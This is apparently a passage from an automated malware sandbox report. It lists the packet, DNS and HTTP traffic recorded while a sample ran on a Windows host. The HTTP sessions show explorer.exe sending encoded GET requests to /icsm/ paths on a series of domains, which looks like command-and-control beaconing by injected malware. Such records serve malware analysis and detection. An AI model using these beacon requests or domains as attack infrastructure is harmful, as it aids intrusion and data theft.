                                                                      May 12, 2021 06:11:08.363538980 CEST804971862.149.189.71192.168.2.5
                                                                      May 12, 2021 06:11:08.363763094 CEST4971880192.168.2.562.149.189.71
                                                                      May 12, 2021 06:11:08.363837004 CEST4971880192.168.2.562.149.189.71
                                                                      May 12, 2021 06:11:08.665510893 CEST4971880192.168.2.562.149.189.71
                                                                      May 12, 2021 06:11:09.275211096 CEST4971880192.168.2.562.149.189.71
                                                                      May 12, 2021 06:11:10.478286028 CEST4971880192.168.2.562.149.189.71
                                                                      May 12, 2021 06:11:12.884835958 CEST4971880192.168.2.562.149.189.71
                                                                      May 12, 2021 06:11:13.437242985 CEST4971980192.168.2.523.227.38.74
                                                                      May 12, 2021 06:11:13.482142925 CEST804971923.227.38.74192.168.2.5
                                                                      May 12, 2021 06:11:13.482316017 CEST4971980192.168.2.523.227.38.74
                                                                      May 12, 2021 06:11:13.482528925 CEST4971980192.168.2.523.227.38.74
                                                                      May 12, 2021 06:11:13.526175022 CEST804971923.227.38.74192.168.2.5
                                                                      May 12, 2021 06:11:13.647634983 CEST804971923.227.38.74192.168.2.5
                                                                      May 12, 2021 06:11:13.647696972 CEST804971923.227.38.74192.168.2.5
                                                                      May 12, 2021 06:11:13.647722960 CEST804971923.227.38.74192.168.2.5
                                                                      May 12, 2021 06:11:13.647748947 CEST804971923.227.38.74192.168.2.5
                                                                      May 12, 2021 06:11:13.647768021 CEST804971923.227.38.74192.168.2.5
                                                                      May 12, 2021 06:11:13.647921085 CEST4971980192.168.2.523.227.38.74
                                                                      May 12, 2021 06:11:13.648022890 CEST804971923.227.38.74192.168.2.5
                                                                      May 12, 2021 06:11:13.648037910 CEST4971980192.168.2.523.227.38.74
                                                                      May 12, 2021 06:11:13.648087978 CEST4971980192.168.2.523.227.38.74
                                                                      May 12, 2021 06:11:13.651108027 CEST804971923.227.38.74192.168.2.5
                                                                      May 12, 2021 06:11:13.651184082 CEST4971980192.168.2.523.227.38.74
                                                                      May 12, 2021 06:11:17.697598934 CEST4971880192.168.2.562.149.189.71
                                                                      May 12, 2021 06:11:18.743036985 CEST4972080192.168.2.585.233.160.22
                                                                      May 12, 2021 06:11:18.795769930 CEST804972085.233.160.22192.168.2.5
                                                                      May 12, 2021 06:11:18.796403885 CEST4972080192.168.2.585.233.160.22
                                                                      May 12, 2021 06:11:18.796605110 CEST4972080192.168.2.585.233.160.22
                                                                      May 12, 2021 06:11:18.848905087 CEST804972085.233.160.22192.168.2.5
                                                                      May 12, 2021 06:11:18.849797010 CEST804972085.233.160.22192.168.2.5
                                                                      May 12, 2021 06:11:18.849983931 CEST804972085.233.160.22192.168.2.5
                                                                      May 12, 2021 06:11:18.850141048 CEST4972080192.168.2.585.233.160.22
                                                                      May 12, 2021 06:11:18.850188017 CEST4972080192.168.2.585.233.160.22
                                                                      May 12, 2021 06:11:18.904484034 CEST804972085.233.160.22192.168.2.5
                                                                      May 12, 2021 06:11:24.164902925 CEST4972480192.168.2.5150.95.255.38
                                                                      May 12, 2021 06:11:24.480098009 CEST8049724150.95.255.38192.168.2.5
                                                                      May 12, 2021 06:11:24.480214119 CEST4972480192.168.2.5150.95.255.38
                                                                      May 12, 2021 06:11:24.480335951 CEST4972480192.168.2.5150.95.255.38
                                                                      May 12, 2021 06:11:24.793428898 CEST8049724150.95.255.38192.168.2.5
                                                                      May 12, 2021 06:11:24.793498039 CEST8049724150.95.255.38192.168.2.5
                                                                      May 12, 2021 06:11:24.793528080 CEST8049724150.95.255.38192.168.2.5
                                                                      May 12, 2021 06:11:24.793703079 CEST4972480192.168.2.5150.95.255.38
                                                                      May 12, 2021 06:11:24.795022964 CEST4972480192.168.2.5150.95.255.38
                                                                      May 12, 2021 06:11:25.107990026 CEST8049724150.95.255.38192.168.2.5
                                                                      May 12, 2021 06:11:27.307744980 CEST4971880192.168.2.562.149.189.71
                                                                      May 12, 2021 06:11:29.894157887 CEST4972580192.168.2.58.210.40.49
                                                                      May 12, 2021 06:11:30.170943022 CEST80497258.210.40.49192.168.2.5
                                                                      May 12, 2021 06:11:30.171107054 CEST4972580192.168.2.58.210.40.49
                                                                      May 12, 2021 06:11:30.171286106 CEST4972580192.168.2.58.210.40.49
                                                                      May 12, 2021 06:11:30.447992086 CEST80497258.210.40.49192.168.2.5
                                                                      May 12, 2021 06:11:30.448025942 CEST80497258.210.40.49192.168.2.5
                                                                      May 12, 2021 06:11:30.448041916 CEST80497258.210.40.49192.168.2.5
                                                                      May 12, 2021 06:11:30.448206902 CEST4972580192.168.2.58.210.40.49
                                                                      May 12, 2021 06:11:30.448276997 CEST4972580192.168.2.58.210.40.49
                                                                      May 12, 2021 06:11:30.725559950 CEST80497258.210.40.49192.168.2.5
                                                                      May 12, 2021 06:11:45.730526924 CEST4972780192.168.2.534.102.136.180
                                                                      May 12, 2021 06:11:45.771503925 CEST804972734.102.136.180192.168.2.5
                                                                      May 12, 2021 06:11:45.771606922 CEST4972780192.168.2.534.102.136.180
                                                                      May 12, 2021 06:11:45.772072077 CEST4972780192.168.2.534.102.136.180
                                                                      May 12, 2021 06:11:45.813093901 CEST804972734.102.136.180192.168.2.5
                                                                      May 12, 2021 06:11:45.909532070 CEST804972734.102.136.180192.168.2.5
                                                                      May 12, 2021 06:11:45.909596920 CEST804972734.102.136.180192.168.2.5
                                                                      May 12, 2021 06:11:45.909837008 CEST4972780192.168.2.534.102.136.180
                                                                      May 12, 2021 06:11:45.909900904 CEST4972780192.168.2.534.102.136.180
                                                                      May 12, 2021 06:11:45.950901031 CEST804972734.102.136.180192.168.2.5

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      May 12, 2021 06:09:34.283843994 CEST6434453192.168.2.58.8.8.8
                                                                      May 12, 2021 06:09:34.335406065 CEST53643448.8.8.8192.168.2.5
                                                                      May 12, 2021 06:09:34.902295113 CEST6206053192.168.2.58.8.8.8
                                                                      May 12, 2021 06:09:34.959502935 CEST53620608.8.8.8192.168.2.5
                                                                      May 12, 2021 06:09:35.709083080 CEST6180553192.168.2.58.8.8.8
                                                                      May 12, 2021 06:09:35.762042999 CEST53618058.8.8.8192.168.2.5
                                                                      May 12, 2021 06:09:37.292479992 CEST5479553192.168.2.58.8.8.8
                                                                      May 12, 2021 06:09:37.341233015 CEST53547958.8.8.8192.168.2.5
                                                                      May 12, 2021 06:09:37.589746952 CEST4955753192.168.2.58.8.8.8
                                                                      May 12, 2021 06:09:37.649698973 CEST53495578.8.8.8192.168.2.5
                                                                      May 12, 2021 06:09:39.478003025 CEST6173353192.168.2.58.8.8.8
                                                                      May 12, 2021 06:09:39.526659012 CEST53617338.8.8.8192.168.2.5
                                                                      May 12, 2021 06:09:40.772716045 CEST6544753192.168.2.58.8.8.8
                                                                      May 12, 2021 06:09:40.821523905 CEST53654478.8.8.8192.168.2.5
                                                                      May 12, 2021 06:09:42.004847050 CEST5244153192.168.2.58.8.8.8
                                                                      May 12, 2021 06:09:42.053600073 CEST53524418.8.8.8192.168.2.5
                                                                      May 12, 2021 06:09:43.216428995 CEST6217653192.168.2.58.8.8.8
                                                                      May 12, 2021 06:09:43.265111923 CEST53621768.8.8.8192.168.2.5
                                                                      May 12, 2021 06:09:45.508809090 CEST5959653192.168.2.58.8.8.8
                                                                      May 12, 2021 06:09:45.557526112 CEST53595968.8.8.8192.168.2.5
                                                                      May 12, 2021 06:09:47.106349945 CEST6529653192.168.2.58.8.8.8
                                                                      May 12, 2021 06:09:47.157958031 CEST53652968.8.8.8192.168.2.5
                                                                      May 12, 2021 06:09:48.625264883 CEST6318353192.168.2.58.8.8.8
                                                                      May 12, 2021 06:09:48.673979998 CEST53631838.8.8.8192.168.2.5
                                                                      May 12, 2021 06:09:49.491476059 CEST6015153192.168.2.58.8.8.8
                                                                      May 12, 2021 06:09:49.551354885 CEST53601518.8.8.8192.168.2.5
                                                                      May 12, 2021 06:10:00.726229906 CEST5696953192.168.2.58.8.8.8
                                                                      May 12, 2021 06:10:00.786649942 CEST53569698.8.8.8192.168.2.5
                                                                      May 12, 2021 06:10:21.639175892 CEST5516153192.168.2.58.8.8.8
                                                                      May 12, 2021 06:10:21.707287073 CEST53551618.8.8.8192.168.2.5
                                                                      May 12, 2021 06:10:49.304970980 CEST5475753192.168.2.58.8.8.8
                                                                      May 12, 2021 06:10:49.363789082 CEST53547578.8.8.8192.168.2.5
                                                                      May 12, 2021 06:10:52.420631886 CEST4999253192.168.2.58.8.8.8
                                                                      May 12, 2021 06:10:52.571346045 CEST53499928.8.8.8192.168.2.5
                                                                      May 12, 2021 06:10:57.795087099 CEST6007553192.168.2.58.8.8.8
                                                                      May 12, 2021 06:10:57.885720015 CEST53600758.8.8.8192.168.2.5
                                                                      May 12, 2021 06:11:03.061557055 CEST5501653192.168.2.58.8.8.8
                                                                      May 12, 2021 06:11:03.124828100 CEST53550168.8.8.8192.168.2.5
                                                                      May 12, 2021 06:11:08.172087908 CEST6434553192.168.2.58.8.8.8
                                                                      May 12, 2021 06:11:08.245578051 CEST53643458.8.8.8192.168.2.5
                                                                      May 12, 2021 06:11:13.373060942 CEST5712853192.168.2.58.8.8.8
                                                                      May 12, 2021 06:11:13.436161995 CEST53571288.8.8.8192.168.2.5
                                                                      May 12, 2021 06:11:18.654652119 CEST5479153192.168.2.58.8.8.8
                                                                      May 12, 2021 06:11:18.741679907 CEST53547918.8.8.8192.168.2.5
                                                                      May 12, 2021 06:11:20.400882006 CEST5046353192.168.2.58.8.8.8
                                                                      May 12, 2021 06:11:20.475410938 CEST53504638.8.8.8192.168.2.5
                                                                      May 12, 2021 06:11:22.926269054 CEST5039453192.168.2.58.8.8.8
                                                                      May 12, 2021 06:11:22.985301018 CEST53503948.8.8.8192.168.2.5
                                                                      May 12, 2021 06:11:23.877700090 CEST5853053192.168.2.58.8.8.8
                                                                      May 12, 2021 06:11:24.163995981 CEST53585308.8.8.8192.168.2.5
                                                                      May 12, 2021 06:11:29.830585957 CEST5381353192.168.2.58.8.8.8
                                                                      May 12, 2021 06:11:29.892627001 CEST53538138.8.8.8192.168.2.5
                                                                      May 12, 2021 06:11:35.455265045 CEST6373253192.168.2.58.8.8.8
                                                                      May 12, 2021 06:11:35.520087004 CEST53637328.8.8.8192.168.2.5
                                                                      May 12, 2021 06:11:40.179445982 CEST5734453192.168.2.58.8.8.8
                                                                      May 12, 2021 06:11:40.244952917 CEST53573448.8.8.8192.168.2.5
                                                                      May 12, 2021 06:11:40.564667940 CEST5445053192.168.2.58.8.8.8
                                                                      May 12, 2021 06:11:40.639816046 CEST53544508.8.8.8192.168.2.5
                                                                      May 12, 2021 06:11:45.658201933 CEST5926153192.168.2.58.8.8.8
                                                                      May 12, 2021 06:11:45.726883888 CEST53592618.8.8.8192.168.2.5
                                                                      May 12, 2021 06:11:50.920507908 CEST5715153192.168.2.58.8.8.8
                                                                      May 12, 2021 06:11:51.080497026 CEST53571518.8.8.8192.168.2.5
                                                                      May 12, 2021 06:11:56.217856884 CEST5941353192.168.2.58.8.8.8
                                                                      May 12, 2021 06:11:56.303303003 CEST53594138.8.8.8192.168.2.5

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                      May 12, 2021 06:10:52.420631886 CEST192.168.2.58.8.8.80xbbd8Standard query (0)www.roastedorganic.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 06:10:57.795087099 CEST192.168.2.58.8.8.80xe9ddStandard query (0)www.voiceclubdubai.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:03.061557055 CEST192.168.2.58.8.8.80x469bStandard query (0)www.w-c727or.netA (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:08.172087908 CEST192.168.2.58.8.8.80xbc63Standard query (0)www.geacasolaro.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:13.373060942 CEST192.168.2.58.8.8.80x4d71Standard query (0)www.charmboutiques.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:18.654652119 CEST192.168.2.58.8.8.80x3c70Standard query (0)www.websitemax.co.ukA (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:23.877700090 CEST192.168.2.58.8.8.80x73a4Standard query (0)www.year-action.xyzA (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:29.830585957 CEST192.168.2.58.8.8.80x6819Standard query (0)www.hdjakdhf.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:35.455265045 CEST192.168.2.58.8.8.80xa038Standard query (0)www.kantan-sedori.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:40.564667940 CEST192.168.2.58.8.8.80x59cbStandard query (0)www.shanghainternational.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:45.658201933 CEST192.168.2.58.8.8.80x88a8Standard query (0)www.susanestuart.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:50.920507908 CEST192.168.2.58.8.8.80x80deStandard query (0)www.algaeflipflops.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:56.217856884 CEST192.168.2.58.8.8.80x2892Standard query (0)www.thelordnelsonwinthorpe.comA (IP address)IN (0x0001)

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                      May 12, 2021 06:10:52.571346045 CEST8.8.8.8192.168.2.50xbbd8No error (0)www.roastedorganic.com75.2.115.196A (IP address)IN (0x0001)
                                                                      May 12, 2021 06:10:57.885720015 CEST8.8.8.8192.168.2.50xe9ddNo error (0)www.voiceclubdubai.comvoiceclubdubai.comCNAME (Canonical name)IN (0x0001)
                                                                      May 12, 2021 06:10:57.885720015 CEST8.8.8.8192.168.2.50xe9ddNo error (0)voiceclubdubai.com91.148.168.141A (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:03.124828100 CEST8.8.8.8192.168.2.50x469bName error (3)www.w-c727or.netnonenoneA (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:08.245578051 CEST8.8.8.8192.168.2.50xbc63No error (0)www.geacasolaro.com62.149.189.71A (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:13.436161995 CEST8.8.8.8192.168.2.50x4d71No error (0)www.charmboutiques.comcharmbracelet-shop.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                      May 12, 2021 06:11:13.436161995 CEST8.8.8.8192.168.2.50x4d71No error (0)charmbracelet-shop.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                      May 12, 2021 06:11:13.436161995 CEST8.8.8.8192.168.2.50x4d71No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:18.741679907 CEST8.8.8.8192.168.2.50x3c70No error (0)www.websitemax.co.ukwebforward.lcn.comCNAME (Canonical name)IN (0x0001)
                                                                      May 12, 2021 06:11:18.741679907 CEST8.8.8.8192.168.2.50x3c70No error (0)webforward.lcn.comfwd3.hosts.co.ukCNAME (Canonical name)IN (0x0001)
                                                                      May 12, 2021 06:11:18.741679907 CEST8.8.8.8192.168.2.50x3c70No error (0)fwd3.hosts.co.uk85.233.160.22A (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:18.741679907 CEST8.8.8.8192.168.2.50x3c70No error (0)fwd3.hosts.co.uk85.233.160.24A (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:18.741679907 CEST8.8.8.8192.168.2.50x3c70No error (0)fwd3.hosts.co.uk85.233.160.23A (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:24.163995981 CEST8.8.8.8192.168.2.50x73a4No error (0)www.year-action.xyz150.95.255.38A (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:29.892627001 CEST8.8.8.8192.168.2.50x6819No error (0)www.hdjakdhf.com8.210.40.49A (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:35.520087004 CEST8.8.8.8192.168.2.50xa038Name error (3)www.kantan-sedori.comnonenoneA (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:40.639816046 CEST8.8.8.8192.168.2.50x59cbName error (3)www.shanghainternational.comnonenoneA (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:45.726883888 CEST8.8.8.8192.168.2.50x88a8No error (0)www.susanestuart.comsusanestuart.comCNAME (Canonical name)IN (0x0001)
                                                                      May 12, 2021 06:11:45.726883888 CEST8.8.8.8192.168.2.50x88a8No error (0)susanestuart.com34.102.136.180A (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:51.080497026 CEST8.8.8.8192.168.2.50x80deNo error (0)www.algaeflipflops.com64.190.62.111A (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:56.303303003 CEST8.8.8.8192.168.2.50x2892No error (0)www.thelordnelsonwinthorpe.com94.136.40.51A (IP address)IN (0x0001)

                                                                      HTTP Request Dependency Graph

                                                                      • www.roastedorganic.com
                                                                      • www.voiceclubdubai.com
                                                                      • www.geacasolaro.com
                                                                      • www.charmboutiques.com
                                                                      • www.websitemax.co.uk
                                                                      • www.year-action.xyz
                                                                      • www.hdjakdhf.com
                                                                      • www.susanestuart.com

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      0192.168.2.54971675.2.115.19680C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 06:10:52.620214939 CEST1331OUTGET /icsm/?zZSlDz=zaS0K7Z6s3udRIV54ona/Y7FMvuM79U9hGlb72LKWqTP1QF33lUaB5+awkVfTrm4Szdf&b6jPH=FBZdWxvpgT HTTP/1.1
                                                                      Host: www.roastedorganic.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 06:10:52.777667046 CEST1332INHTTP/1.1 403 Forbidden
                                                                      Date: Wed, 12 May 2021 04:10:52 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 146
                                                                      Connection: close
                                                                      Server: nginx
                                                                      Vary: Accept-Encoding
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      1192.168.2.54971791.148.168.14180C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 06:10:57.964154959 CEST1333OUTGET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=S3hZ9hucZB3EtOR58Q5nEiimGsTcBclBSgHOETXnBYv0klj7oHI8wHmFL3huZKvOqIBH HTTP/1.1
                                                                      Host: www.voiceclubdubai.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 06:10:58.051840067 CEST1333INHTTP/1.1 403 Forbidden
                                                                      Date: Wed, 12 May 2021 04:10:58 GMT
                                                                      Server: Apache
                                                                      Content-Length: 318
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      2192.168.2.54971862.149.189.7180C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 06:11:08.305753946 CEST1334OUTGET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=7Y2cvYyrvfqxgunt3pZhUV8c5sAKyRnRxEqYxYZ4IV2yKeALIaVm9IYD5cxomw6uu8uh HTTP/1.1
                                                                      Host: www.geacasolaro.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 06:11:08.363512993 CEST1335INHTTP/1.1 404 Not Found
                                                                      Server: openresty
                                                                      Date: Wed, 12 May 2021 04:11:08 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Content-Length: 253
                                                                      Connection: close
                                                                      X-Varnish: 824312071
                                                                      Retry-After: 5
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 20 20 3c 68 33 3e 47 75 72 75 20 4d 65 64 69 74 61 74 69 6f 6e 3a 3c 2f 68 33 3e 0a 20 20 20 20 3c 70 3e 58 49 44 3a 20 38 32 34 33 31 32 30 37 31 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 3e 0a 20 20 20 20 3c 70 3e 56 61 72 6e 69 73 68 20 63 61 63 68 65 20 73 65 72 76 65 72 3c 2f 70 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html> <head> <title>404 Not Found</title> </head> <body> <h1>Error 404 Not Found</h1> <p>Not Found</p> <h3>Guru Meditation:</h3> <p>XID: 824312071</p> <hr> <p>Varnish cache server</p> </body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      3192.168.2.54971923.227.38.7480C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 06:11:13.482528925 CEST1336OUTGET /icsm/?zZSlDz=abv0Zjoypqon102KK4Aabri2R1obo2mniMfeUFfIxPUpBgCKzPX+m7Nu7myx3UJKSvBt&b6jPH=FBZdWxvpgT HTTP/1.1
                                                                      Host: www.charmboutiques.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 06:11:13.647634983 CEST1337INHTTP/1.1 403 Forbidden
                                                                      Date: Wed, 12 May 2021 04:11:13 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      X-Sorting-Hat-PodId: 163
                                                                      X-Sorting-Hat-ShopId: 46720286884
                                                                      X-Dc: gcp-us-central1
                                                                      X-Request-ID: 8ba024b4-24d2-42c4-a108-db837ba28889
                                                                      X-XSS-Protection: 1; mode=block
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Permitted-Cross-Domain-Policies: none
                                                                      CF-Cache-Status: DYNAMIC
                                                                      cf-request-id: 0a005e9cec00004a5bb7b08000000001
                                                                      Server: cloudflare
                                                                      CF-RAY: 64e0cd417cd24a5b-FRA
                                                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                      Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67
                                                                      Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-heig
